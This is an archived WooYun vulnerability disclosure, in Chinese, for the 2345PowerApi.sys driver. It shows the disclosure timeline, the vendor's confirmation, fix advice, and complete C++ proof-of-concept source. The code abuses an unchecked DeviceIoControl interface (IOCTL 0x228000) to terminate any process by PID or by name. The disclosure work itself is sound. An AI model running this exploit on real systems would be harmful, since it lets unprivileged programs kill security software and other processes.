乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-04-09: 细节已通知厂商并且等待厂商处理中 2015-04-09: 厂商已经确认,细节仅向厂商公开 2015-04-12: 细节向第三方安全合作伙伴开放 2015-06-03: 细节向核心白帽子及相关领域专家公开 2015-06-13: 细节向普通白帽子公开 2015-06-23: 细节向实习白帽子公开 2015-07-08: 细节向公众公开
软件版本:1.3.0.5363问题原因:2345PowerApi.sys没有做打开校验,任意程序可以通过DeviceIoControl操作这个驱动,包括但不限于杀任意进程。
// 2345.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include <windows.h>#include <vector>using namespace std;#include<tlhelp32.h>#define DEVICENAME L"\\\\.\\2345PowerApi"void PrintErrCodeMessage(char *preMsg){ LPVOID lpMsgBuf; DWORD dwErrorCode = GetLastError(); if(NULL!=preMsg) printf("%s\n",preMsg); if(FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, //dwFlags NULL, //lpSource dwErrorCode, //dwMessageId MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPSTR)&lpMsgBuf, //lpBuffer 0, //nSize NULL //Arguments )) { printf("Fail Code: %d\r\n", dwErrorCode); printf("Fail Message: %s\r\n", lpMsgBuf); }else{ printf("Fail Code: %d\r\n", dwErrorCode); printf("Failed to fetch the Error Message\r\n"); } printf("Open Device Failed!\r\n"); if(lpMsgBuf) LocalFree(lpMsgBuf); return;}int TerminateByPid(DWORD dwPid){ char szOutBuf[100] = {0}; DWORD nOutLen = sizeof(szOutBuf); HANDLE hDevice = CreateFileW( DEVICENAME , GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL ); if(hDevice == INVALID_HANDLE_VALUE){ PrintErrCodeMessage("[CreateFileA]"); goto end; }else{ printf("Open Device Success!\r\n"); } printf("press any key to continue!\n"); getchar(); BOOL ret = DeviceIoControl(hDevice, 0x228000, &dwPid, sizeof(dwPid), szOutBuf, // out_buffer nOutLen, // out_buffer_len = 0 &nOutLen, // NULL); if(!ret) { PrintErrCodeMessage("[DeviceIoControl]"); goto end; } else printf("DeviceIoControl Successed!\n");end: CloseHandle(hDevice); return 0;}BOOL GetPidsByNameLike(IN char szProcName[],OUT vector<DWORD> &vPids){ if(NULL==szProcName) return FALSE; HANDLE hProcessSnap = NULL; PROCESSENTRY32 pe32= {0}; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hProcessSnap == (HANDLE)-1) { return FALSE; } pe32.dwSize = sizeof(PROCESSENTRY32); if(Process32First(hProcessSnap, &pe32)) { do { if(NULL!=strstr(pe32.szExeFile,szProcName)) { vPids.push_back(pe32.th32ProcessID); } }while (Process32Next(hProcessSnap, &pe32)); } CloseHandle (hProcessSnap); return TRUE;}int TerminateByNL(char szNL[]){ vector<DWORD> vPids; char szOutBuf[100] = {0}; DWORD nOutLen = sizeof(szOutBuf); HANDLE hDevice = CreateFileW( DEVICENAME , GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL ); if(hDevice == INVALID_HANDLE_VALUE){ PrintErrCodeMessage("[CreateFileA]"); goto end; }else{ printf("Open Device Success!\r\n"); } printf("press any key to continue!\n"); getchar(); GetPidsByNameLike(szNL,vPids); for(int i=0;i<vPids.size();i++) { DWORD dwPid = vPids[i]; printf("NL:%s , Pid:%u\n",szNL,vPids[i]); BOOL ret = DeviceIoControl(hDevice, 0x228000, &dwPid, sizeof(dwPid), szOutBuf, // out_buffer nOutLen, // out_buffer_len = 0 &nOutLen, // NULL); if(!ret) { PrintErrCodeMessage("[DeviceIoControl]"); goto end; } else printf("DeviceIoControl Successed!\n"); }end: CloseHandle(hDevice); return 0;}void Useage(){ printf("使用方法,如下例子:\n"); printf(" 2345terminate -pid xxx\n"); printf(" 2345terminate -namelike xxx\n");}int _tmain(int argc, _TCHAR* argv[]){ if(argc!=3) { Useage(); return -1; } if(0==strcmp(argv[1],"-pid")) TerminateByPid(atoi(argv[2])); else if(0==strcmp(argv[1],"-namelike")) TerminateByNL(argv[2]); else { Useage(); return -1; } return 0;}
做好驱动的打开校验
危害等级:中
漏洞Rank:6
确认时间:2015-04-09 15:43
感谢您对2345的关注,我们会在下一版本中修复此问题
暂无
